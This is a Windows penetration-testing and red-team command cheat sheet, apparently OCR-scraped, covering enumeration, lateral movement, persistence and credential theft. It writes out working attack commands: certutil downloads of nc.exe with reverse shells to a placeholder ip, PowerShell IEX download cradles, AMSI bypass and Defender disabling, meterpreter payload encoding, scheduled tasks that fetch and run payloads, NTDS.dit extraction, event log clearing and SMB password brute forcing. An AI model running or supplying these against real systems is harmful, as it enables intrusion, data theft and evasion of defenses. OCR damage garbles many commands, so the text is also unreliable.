Windows
Windows
Versions
NT 3.1
Windows NT 3.1 (All)
NT 3.5
Windows NT 3.5 (All)
NT 3.51
Windows NT 3.51 (All)
NT 4.0
Windows NT 4.0 (All)
NT 5.0
Windows 2000 (All)
NT 5.1
Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
NT 5.2
Windows XP (64-bit, Pro 64-bit) Windows Server 2003 & R2 (Standard, Enterprise)
Windows Home Server
NT 6.0
Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate)
NT 6.1
Windows 7 (Starter, Home, Pro, Enterprise, Ultimate) Windows Server 2008 R2 (Foundation, Standard, Enterprise)
NT 6.2
Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) Windows Phone 8 Windows Server 2012 (Foundation, Essentials, Standard)
Files
Command
Explanation
%SYSTEMROOT%
Usually C:\Windows
%SYSTEMROOT%\System32\drivers\etc\hosts
DNS Entities
%SYSTEMROOT%\System32\drivers\etc\networks
Network settings
%SYSTEMROOT% system32 config\SAM
Username and password hash
%SYSTEMROOT%\repair\SAM
Copy of SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
Backup copy of SAM
%WINDIR%\system32\config\AppEvent.Evt
Program reports
%WINDIR%\system32\config\SecEvent.Evt
Security reports
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
Startup path
%USERPROFILE%\Start Menu\Programs\Startup\
Startup path
%SYSTEMROOT%\Prefetch
Path Prefetch (EXE reports)
Launcher paths
For WINDOWS NT 6.1,6.0
# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
For WINDOWS NT 5.2, 5.1, 5.0
%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
FOR WINDOWS 9x
%SystemDrive%\wmiOWS\Start Menu\Programs\Startup
for WINDOWS NT 4.0, 3.51, 3.50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
System information commands
Command
Explanation
version
Operating system version
sc query state=all
Show services
tasklist /svc
Show process and services
tasklist /m
Show all processes and dlls
tasklist /S ip /v
Remotely running processes
taskkill /PID pid /F
Forced removal of the process
systeminfo /S ip /U domain\user /P Pwd
Receive system information remotely
reg query \ ip \ RegDomain \ Key /v VALUE
Send a query to the registry, /s=all values
reg query HKLM /f password /t REG_SZ /s
Registry search for passwords
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WSUS address
fsutil fsinfo drives
List of drivers β’ need admin access
dir /a /s /b c:'.pdfβ
Search for all pdf files
dir /a /b c:\windows\kbβ
Search for patches
findstr /si passwordβ .txt I β’.xmll β’.xls
Search files for passwords
tree /F /A c: tree.txt
List of folders on drive C:
reg save HKLM\Security security.hive
Save security hives inside the file
echo %USERNAME%
Current user
whoami /priv
Current user permissions
command net/domain
net view /domain
Current domain host
net view /domain: [MYDOMAIN]
hosts in [MYDOMAIN]
net user /domain
All users of the current domain
net user user pass /add
Add user
net localgroup "Administrators" user /add
Add user to Administrators
net accounts /domain
Domain password policies
net localgroup "Administrators"
List of Local Admins
net group /domain
List of domain groups
net group "Domain Admins" /domain
List of Admin users in the domain
net group "Domain Controllers" /domain
List of DCs for the current domain
net share
SMB share
net session I find I "\"
List of active SMB sessions
net user user /ACTIVE:yes /domain
Open domain domain
net user user '' newpassword '' /domain
Change domain username and password
net share share c:\share
/GRANT:Everyone,FULL
Shared folder
Remote commands
tasklist /S ip /v
Processes running on ip
systeminfo /S ip /U domain\user /P Pwd
IP information
net share \\ ip
ip environment
net use \\ ip
ip system file
net use z: \\ ip \share password
/user: DOMAIN user
Map drive, specified
credentials
reg add \\ ip \ regkey \ value
Added registry key for ip
sc \\ ip create service
binpath=C:\Windows\System32\x.exe start=auto
Create a remote service
(space after start=)
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:/windows/temp/nc.exe
Copy file from ip to current system by cmd.exe
cmd.exe /c c:/windows/temp/nc.exe ip port -e cmd.exe
Shell reverse
nc.exe -lvvp port
Listening on specific port
python3 -m http.server port
Create webserver
xcopy /s \\ ip \dir C:\local
Copy of ip fodder
shutdown /m \\ ip /r /t 0 /f
restart system with ip
Network commands
ipconfig I all
ip settings
ipconfig /displaydns
DNS cache
netstat -ana
Show connection
netstat -anop tcp 1
Create Netstat loop
netstat -ani findstr LISTENING
Ports in use
route print
Route tables
arp -a
Get system MACs (using ARP table)
nslookup, set type=any, ls -d domain
results.txt, exit
Get DNS Zone Xfer
nslookup -type=SRV _www._tcp.url.com
Get Domain SRV lookup (ldap, kerberos, sip)
tftp -I ip GET remotefile
File Transfer in TFTP
netsh wlan show profiles
Profiles stored on the wireless network
netsh firewall set opmode disable
Firewall deactivation ('Old)
netsh wlan export profile folder=. key=clear
wifi extraction in plaintext
netsh interface ip show interfaces
List of IDs/MTUs related to interfaces
netsh interface ip set address local static
ip nmask gw ID
Set IP
netsh interface ip set dns local static ip
DNS server configuration
netsh interface ip set address local dhcp
Set interface to use DHCP
Functional commands
type file
Show file contents
del path \' .β’ /a /s /q /f
Delete files in current path
find /I ''str'' filename
command I find /c /v ""
List of cmd outputs
at HH:MM file [args] (i.e. at 14:45 cmd /c)
File execution schedule
runas /user: user " file [args]"
Execute file with specific user
restart /r /t 0
Restart
sc stop UsoSvc
Stop the UsoSvc service
sc start UsoSvc
Starting the UsoSvc service
sc config UsoSvc binpath="c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe"
Change path of executable file by UsoSvc
tr -d '\15\32' win.txt unix.txt
Delete CR & 'Z ('nix)
makecab file
Compression
Wusa.exe /uninstall /kb: ###
Delete patch
cmd.exe "wevtutil qe Application /c:40
/f:text /rd:true"
Using the Event Viewer in the CLI
lusrrngr.msc
Using Local user manager
services.msc
Using Services control panel
taskmgr.exe
Using Task manager
secpool.rnsc
Using Security policy manager
eventvwr.rnsc
Using Event viewer
MISC. commands
Locking the workstation
rundll32.dll user32.dll LockWorkstation
Disable Windows Firewall
netsh advfirewall set currentprofile state off netsh advfirewall set allprofiles state off
Create port forward (*need admin access)
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2
#Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=l.l.l.l
enable cmd
reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /t REG DWORD /d 0 /f
PSEXEC command
Remote file execution with specific identity information
psexec /accepteula \\ targetiP -u domain\user -p password -c -f \\ smbiP \share\file.exe
Execution of command with special hash
psexec /accepteula \\ ip -u Domain\user -p Lt1 c:\Program-1
Run the command on the remote system
psexec /accepteula \\ ip -s cmd.exe
Terminal service (RDP)
Start RDP
Create regfile.reg file with following line in it: HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService
"fDenyTSCo~nections"=dword: 00000000
reg import reg file. reg
net start ''terrnservice''
sc config terrnservice start= auto
net start terrnservice
--OR--
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
RDP tunnel from port 443 (need to restart the terminal service)
REG ADD "HKLt1\System\CurrentControlSet\Control \Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
Remove network authentication by adding an exception in the firewall
reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable
Import task from XML file
schtasks.exe /create /tn t1yTask /xml "C:\MyTask.xml" /f
WMIC command
wmic [alias] get /?
List of all features
wmic [alias] call /?
Callable method
wmic process list full
process properties
wmic startupwmic service
start wmic service
wmic ntdomain list
Domain and DC information
wmic qfe
List of all patches
wrnic process call create "process_name"
Run process
wmic process where name="process" call
terminate
Delete process
wmic logicaldisk get description,name
Display logical sharing environment
wmic cpu get DataWidth /format:list
Show 32-bit or 64-bit version of the system
wmic service where started = true get name, startname
Show running services
WMIC [alias] [where] [clause]
[alias] == process, share, startup, service, nicconfig, useraccount, etc.
[where] ==where (name="cmd.exe"), where (parentprocessid!=[pid]"), etc.
[clause] ==list [fulllbrief], get [attribl, attrib2], call [method], delete
Run the file in smb with specific identity information
wmic /node: targetiP /user:domain\user /password:password process call create "\ \ smbiP \share\evil.exe"
Remove the software
wmic product get name /value # Get software names
wmic product where name="XXX" call uninstall /nointeractive
Remote user access
wmic /node:remotecomputer computersystern get username
Show processes in real time
wmic /node:machinename process list brief /every:l
Start RDP
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
AllowTSConnections=''O'' call SetAllowTSConnections ''1''
The list of times that the user has entered
wmic netlogin where (name like "%adm%") get numberoflogons
Search services for unquoted routes
wmic service get narne,displayname,pathnarne,startrnode
| findstr /i nauton | findstr /i /v "C:\windows\\" | findstr /i /v """
Copy of Volume shadow
1. wmic /node: DC IP /user:"DOI1AIN\user" /password:"PASS" process
call create "cmd /c vssadmin list shadows 2 &1
c:\temp\output.txt"
# If any copies alread1 ex~st then exfil, otherwise create using
following commands. Check output.txt for anJ errors
2. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process
call create "cmd /c vssadmin create shadow /for=C: 2 &1
C:\temp\output.txt"
3. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process
call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVol~meShadowCopy1\Windows\System32\co nfig\SYSTEM
C:\temp\system.hive 2 &1
C:\temp\output.txt"
4. wmic /node: DC IP /user: "DOl'.llUN\user" /password: "PASS" process call create ''cmd /c copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyc\NTDS\NTDS.dit
C:\temp\ntds.dit 2 &1 C:\temp\output.txt"
Step by step instructions on room362.com for step below
5. From Linux, download and run ntdsxtract and libesedb to export
hashes or other domain information
a. Additional instructions found under the VSSOWN section
b. ntdsxtract - http://www.ntdsxtract.com
c. libesedb - http://code.google.com/p/libesedb/
POWERSHELL environment
Command
Description
stop-transcript
Stop recording
get-content file
Display the contents of the file
get-help command-examples
Display sample command
get-command βstringβ
Search for cmd
get-service
Show services (stopservice, start-service)
get-wmiobject -class win32 service
Show services with the same identity information
$PSVersionTable
Show powershell version
powershell.exe -version 2.0
Run powershell 2.0 from version 3.0
get-service measure-object
Information returned from the service
get-psdrive
List returned from PSDrives
get-process select -expandproperty name
show names
get-help β-parameter credential
Receive identity information
get-wmiobject -list -βnetworkβ
WMI available on the network
(Net.DNS]: :GetnostEntry(β ip βI
Process DNS Lookup
powershell.exe wget βhttp://10.10.10.10/nc.exeβ -outfile βc:\temp\nc.exeβ
Download and save the file
poweshell.exe -c βIEX (New-Object System.Net.WebClient).DownloadString(βhttp://10.10.10.10:8000/powercat.ps1β); powercat -c 10.10.10.100 -p 4444 -e cmd
reverse loose
https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18df36d8e890fefe96a06891dd47d/SimpleHttpServer.ps1
Web server with port 8050
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
Use mimikatz
call ps1 files
Import-Module .\Invoke-Mimikatz.ps1
Download and save the file iwr -uri http://10.10.10.10/file -o file.exe
Bypass AMSI
Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1
Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out
Or
https://raw.githubusercontent.com/kmkz/Pentesting/master/AMSI-Bypass.ps1
. .\AMSI-Bypass.ps1
Invoke-AmsiBypass
Disable realtimemonitoring
powershell -command set-mpppreference -Disable realtimemonitoring $true
List of all users
$users = New-Object DirectoryServices.DirectorySearcher
$users.Filter = "(&(objectclass=user))"
$users.SearchRoot = ''
$users.FindAll()
List of all domains
$computers = New-Object DirectoryServices.DirectorySearcher
$computers.Filter = "(&(objectclass=computer))"
$computers.SearchRoot = ''
$computers.FindAll()
Get AD credentials using donotrequirepreauth
Set-ADAccountControl -identity jorden -doesnotrequirepreauth 1
Deleting security reports and programs (for SVR01)
Get-EventLog -list
Clear-EventLog -logname Application, Security -computername SVR01
Extract the version of the operating system inside the CSV file
Get-WmiObject -class win32 operatingsystem | select -property ' |
export-csv c:\os.txt
List of running services
Get-Service | where_object {$_.status -eq "Running"}
Using ps drive for permanent sharing
New-PSJrive -Persist -PSProvider FileSjstem -Root \\1.1.1.1\tools -Name i
Files written on 8/20
Get-Childitem -Path c:\ -Force -Rec~rse -Filter '.log -ErrorAction
SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}
Get file from http
(new-object sjstem.net.webclient).downloadFile(''url'',''dest'')
tcp port connections (scanner)
$ports=(#,#,#) ;$ip="x.x.x.x";foreach ($port in $ports) {try
($socket=New-object Sjstem.Net.Sockets.TCPClient($ip,$port); }catch(};
if ($socket -eq $NULL) (echo $ip":"$port"- Closed";}
else(echo $ip":"$port"- Open";$socket =$NULL;}}
Ping command with 500 millisecond timeout
$ping = New-Object Sjstex.Net.Networkinformation.ping
$ping.Send(''ip'',5JO)
Basic authentication window
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential(" title "," message "," user" "," domain")
Run the exe file (from cmd.exe) every 4 hours between August 8-11, 2013, device 0800-1700
powershell. exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match
'201308 ( 0 [ 8-9] |1 [0-1])-(0[ 8-9]]|1 [ 0-7]) [ 0-5] [ 0-9]') {Start-Process -
WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400))while(1)"
Run Powershell as
$pw ~ convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp ~ new-object -typename System.Management.Automation.PSCredential -
argument list "DOMAIN\user", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command
&{Start-Process file.exe -verb runas)'
Upload with powershell
πππ€πππ βπππ ππ€π β π’π ππππ ππππππ πππ βπ‘π‘π://192.168.2. π₯/πβππππ»ππ’ππ. ππ₯π β ππ’π‘πΉπππ β πβππππ»ππ’ππ. ππ₯e
Email sender
powershell.exe Send-l-1ai1Hessage -to "email" -from "email" -subject
"Subject" -a "attachment file path" -body "Body" -SmtpServer Target
Email Server IP
Activating remote access to powershell (requires identity information)
net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item
wsman:\localhost\client\trustedhosts ''"
at \ \ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username
hostname and ip list for all domains
Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class
MicrosoftDNS _ ResourceRecord -Filter "domainname~' DOMAIN '" | select
textrepresentation
Download from Powershell from specific path
powershell.exe -noprofile -noninteractive -command
"[System.Net.ServicePointManager] ::ServerCertificateValidationCallback =
{$true); $source="""https:ll YOUR SPECIFIED IP I file.zip """;
$destination="C:\rnaster.zip"; $http = new-object Systern.Net.WebClient;
$response= $http.DownloadFile($source, $destination);"
Display Powershell data
Script will send a file ($filepath) via http to server ($server) via POST request.
Must have web server listening on port designated in the $server
powershell.exe -noprofile -noninteractive -command
"[S;stem.Net.ServicePointManager] ::ServerCertificateValidationCallback =
{$true); $server="""http:// YOUR_SPECIFIED IP / folder """;
$filepath="C:\master.zip" $http= new=object System.Net.WebClient;
$response= $http.UploadFile($server,$filepath);"
Using powershell to run meterpreter from memory
Need Metasploit v4.5+ (msfvenom supports Powershell)
Use Powershell (x86) with 32 bit Meterpreter payloads
encodeMeterpreter.psl script can be found on next page
in the attacking system
1. ./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86 LHOST=1.1.1.1 LPORT=443 audit.psl
2. Move audit.psl into same folder as encodeMeterpreter.psl
3. Launch Powershell (x86)
4. powershell.exe -executionpolicy bypass encodeMeterpreter.psl
5. Copy the encoded Meterpreter string
Start the listener in the attacking system
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse https
4. set LHOST 1. 1. 1. 1
5. set LPORT 443
6. exploit -j
On the target system (run powershell(x86))
1. powershell. exe -noexi t -encodedCommand paste encoded Meterpreter
string here
PROFIT
Encodemeterpreter.ps1 [7]
# Get Contents of Script
$contents = Get-Content audit.psl
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]: :Compress
$cs =New-Object IO.Compression.DeflateStream ($ms,$action)
$sw =New-Object IO.StreamWriter ($cs, [Text.Encoding] ::ASCII)
$contents I ForEach-Object {$sw.WriteLine($ I)
$sw.Close()
# Base64 Encode Stream
$code= [Convert]: :ToBase64String($ms.ToArray())
$command= "Invoke-Expression '$(New-Object IO.StreamReader('$(New-Object
IO. Compression. DeflateStream ('$(New-Object IO. t4emoryStream
(, '$ ( [Convert] : : FromBase64String ('"$code'") ) I I ,
[IO.Compression.Compressiont~ode]: :Decompress) I,
[Text.Encoding]: :ASCII)) .ReadToEnd() ;"
# Invoke-Expression $command
$bytes= [System.Text.Encoding] ::Unicode.GetBytes($command)
$encodedCommand = [Convert]: :ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved. Please see reference [7] for disclaimer
Using powershell to start meterpreter (second method)
On bt attack box
1. msfpayload windows/rneterpreter/reverse tcp LHOST=10.1.1.1
LPORT~8080 R I msfencode -t psh -a x86
in the attacking system
1. c:\powershell
2. PS c:\ $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
3. PS c:\ $u = [System.Text.Encoding]: :Unicode.GetBytes($crnd)
4. PS c: \ $e = [Convert] ::ToBase64String($u)
5. PS c:\ $e
6. Copy contents of $e
Start the listener in the attacking system
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j
In the target system (1: download the shell code, 2: execute)
1. c: \ powershell -noprofile -noninteracti ve -command " &
{$client=new-object
System.Net.WebClient; $client.DownloadFile('http://1.1.1.1/shell.txt
', 'c:\windows\temp\shell.txt') )"
2. c: \ powershell -noprofile -noninteracti ve -noexi t -command " &
{$crnd~tjpe 'c:\windows\temp\shell.txt';powershell -noprofilenoninteractive
-noexit -encodedCornmand $cmd} "
PROFIT
Identification of vulnerable domains with powerup
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
. .\PowerUp.ps1
Windows registry
operating system information
HKLM\Software\Microsoft\Windows NT\CurrentVersion
Product Name
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v
ProductNarne
Installation Date
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate
registered name
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner
System boot information
HKLM\Software\~icrosoft\Windows NT\CurrentVersion /v SystemRoot
Time zone information (in minutes from UTC)
HKLM\System\CurrentControlSet\Control\TimeZoneinformation /v ActiveTirneBias
Map of network drivers
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive
MRU
Mounted devices
HKLM\System\MountedDevices
usb devices
HKLM\System\CurrentControlSet\Enurn\USBStor
Activation of IP forwarding
HKEY_LOCAL_~ACHI~E\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters -
IPEnableRouter = 1
Password keys: LSA secret cat certain vpn, autologon, other passwords
HKEY LOCAL MACHINE\Security\Policy\Secrets
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon
Audit policy information
HKLM\Security\Policy\PolAdTev
Kernel and user services
HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services
software installed in the system
HKLM\Software
Installed software for the user
HKCU\Software
Latest documents
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
The last positions of the user
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisite
dtmu & \Opensavetmu
URLs typed
HKCU\Software\Microsoft\Internet Explorer\TypedURLs
MRU lists
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
The last registry key used
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKeY
Launch paths
HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run
Activation of Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Get Windows information with dsquery
List of domain users
dsquery user -limit 0
List of domain groups domain=victim.com
dsquery group "cn=users, dc=victim, dc=com"
List of domain administrators
dsquery group -name "domain admins" | dsget group -members -expand
List of user groups
dsquery user -name bob | dsget user -memberof -expand
Get the entered user id
dsquery user -name bob | dsget user -samid
List of users who have not been active in the last two weeks
dsquery user - inactive 2
Add user
dsadd user "CN=Bob,CN=Users,DC=victim,DC=com" -samid bob -pwd bobpassdisplaj
"Bob" -pwdneverexpires yes -memberof "CN=Domain
Admins,CN=Users,DC=victim,DC=com
Delete user
dsrm -subtree -noprornpt "CN=Bob,CN=Users,DC=victim,DC=com"
List of domain operating systems
dsquery A "DC=victim,DC=com" -scope subtree -attr "en" "operatingSystem"
"operatingSystemServicePack" -filter
" (& (objectclass=computer) (objectcategory=computer) (operatingSystem=Windows}
))"
List of site names
dsquery site -o rdn -limit 0
List of all subnets in the site
dsquery subnet -site sitename -o rdn
List of services in the site
dsquery server -site sitename -or rdn
Get domain servers
dsquery ' domainroot -filter
" (& (objectCategory=Computer) (objectClass=Computer) (operatingSystem='Server'
) ) "-limit 0
DC list of the site
dsquery "CN=Sites,CN=Configuration,DC=forestRootDomain" -filter
(objectCategory=Server)
Script writing
Bash script variables must be placed in the form %% For example %%i
Create ping sweep
for /L %i in (10,1,254) do@ (for /L %x in (10,1,254) do@ ping -n 1 -w 100
10.10.%i.%x 2 nul 1 find "Reply" && echo 10.10.%i.%x live.txt)
Create a loop inside the file
for /F %i in (file) do command
domain brute forcer operation
for /F %n in (names.txt) do for /F %pin (pawds.txt) do net use \\DC01\IPC$
/user: domain \%n %p 1 NUL 2 &1 && echo %n:%p && net use /delete
\\DCOl\IPC$ NUL
account closing(lockout.bat)
@echo Test run:
for /f %%U in (list.txt) do @for /1 %%C in (1,1,5) do @echo net use \\WIN-
1234\c$ /USER:%%U wrong pass
DHCP exhaustion operation
for /L %i
1.1.1.%i
in (2,1,254) do (netsh interface ip set address local static
netrask gw ID %1 ping 127.0.0.1 -n l -w 10000 nul %1)
DNS reverse lookup process
for /L %i in (100, 1, 105)
dns.txt && echo Server:
do @ nslookup 1.1.1.%i I findstr /i /c:''Name''
1.1.1.%i dns.txt
Search all the paths to find the files that contain PASS and display the details of that file
forfi1es /P c:\temp /s /m pass -c "cmd /c echo @isdir @fdate @ftime
@relpath @path @fsize"
Malicious domain simulation (Application for IDS test)
# Run packet capture on attack domain to receive callout
# domains.txt should contain known malicious domains
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n
attack domain NUL 2 &1 & ping -n 5 127.0.0.1 NUL 2 &1
Operation of IE web looper (traffic generator)
for /L %C in (1,1,5000) do @for %U in (www.yahoo.com www.pastebin.com
www.paypal.com www.craigslist.org www.google.com) do start /b iexplore %U &
ping -n 6 localhost & taskkill /F /IM iexplore.exe
Get access to executive services
for /f "tokens=2 delims='='" %a in ('wmic service list full | find /i
"pathname" I find /i /v "system32"') do @echo %a
c:\windows\temp\3afd4ga.tmp
for /f eol = " delims = " %a in (c:\windows\temp\3afd4ga.tmp) do cmd.exe
/c icacls ''%a''
Spinning Reboot (replace /R with /S to shutdown):
for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t 0 /c "Reboot
message"
Create a shell using vbs (requires identity information)
# Create .vbs script with the following
Set shell wscript.createobject("wscript.shell")
Shell.run "runas /user: user " & """" &
C:\Windows\System32\WindowsPowershell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bjpass -nop -c \" & """" & "IEX ((New-
Object Net.WEbClieil':).downloadstring(' url '))\" & """" & """"
wscript.sleep(100)
shell.Sendkeys "password" & "{ENTER}"
Scheduling the task
Scheduled tasks binary paths CANNOT contain spaces because everything
after the first space in the path is considered to be a command-line
argument. Enclose the /TR path parameter between backslash (\) AND
quotation marks ("):
... /TR "\"C:\Program Files\file.exe\" -x arg1"
Scheduling the task (ST=start time, SD=start date, ED=end date) *need admin access
SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD
MM/DD/YYYY /ED MM/DD/YYYY /tr "C:\my.exe" /RU DOMAIN/user /RP
password
Always schedule task [10]
For 64 bit use:
"C:\Windows\syswow64\WindowsPowerShell\vl.O\powershell.exe"
# (x86) on User Login
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring( ''http:// ip : port I payload'''))'' /SC
onlogon /RU System
# (x86) on System Start
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring("http:// ip : port I payload"))'" /SC
onstart /RU System
# (x86) on User Idle (30 Minutes)
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bjpass -nop -c 'IEX ((new-object
net.webclient) .downloadstring("http:// ip : port I payload"))'" /SC
onidle /i 30
Instructions for working with smb
Log in with a specific user
smbclient -L 10.10.10.10 -U tlevel
Login without password
smbclient -N -L 10.10.10.10
Change password
smbpasswd -r 10.10.10.10 -U tlevel
Show shared route
smbclient -L 10.10.10.10
Show the specified route
smbclient //10.10.10.10/forensic
Login to Shell
smbclient //10.10.10.10/profiles$
Get users along with password hash
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py 10.10.10.10L -usersfile
Guess different smb passwords
with metasploit
msf5 > use auxiliary/scanner/smb/smb_login
set pass_file wordlist
set USER_file users.txt
set RHOSTS 10.10.10.10
run
with medusa
medusa -h 10.10.10.10 -U users.txt -P wordlist -M smbnt
rpcclient commands
entering the system
rpcclient 10.10.10.10 -U support
Show user information
queryuser support
Show users
enumdomusers
Show permissions
enumprivs
Change user access
setuserinfo2 audit2020 23 'redteam'
Show printers
enumprinters
NTLM extraction from ntds.dit file
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system -
hashes lmhash:nthash LOCAL -output nt-hash
Gather information using SharpHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
.\SharpHound.exe
or
SharpHound.exe -c All --zipfilename output.zip
Gather information about Sql Server
https://github.com/NetSPI/PowerUpSQL/blob/master/PowerUpSQL.ps1
. .\PowerUpSQL.ps1
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Obtain AS-REP Roast hash
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
.\Rubeus.exe asreproast
List of available ips without using nmap
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i is up.
Or
https://github.com/sperner/PowerShell/blob/master/PortScan.ps1
.\PortScan.ps1
.\PortScan.ps1 10.10.10.10 1 10000
Service identification with Test-WSMan
PS> Test-WSMan -ComputerName <COMPUTERNAME> -Port 6666
Enumerate OUβs
πΊππ‘ β πππ‘ππ β π£πππππ π
Retrieve users in βICSβ OU
πΊππ‘ β π·πππππππ ππ β πππππβπ΅ππ π "πΏπ·π΄π://ππ = πΌπΆπ,π·πΆ = ππ’πππππ,π·πΆ = π ππ‘π" β ππππππ π
SharpHound Collect
SharpHound.exe --CollectionMethod all
Impersonate Token of nuclear\vdadmin (on psexec session)
ππππππππ‘π. ππ₯π πππ π‘_π‘πππππ βu
ππππππππ‘π. ππ₯π ππ₯πππ’π‘π β π "πππΆπΏπΈπ΄π
\π£ππππππ" πΆ:\ππ πππ \ππ’ππππ\ππππππ¦.ππ₯e
Last updated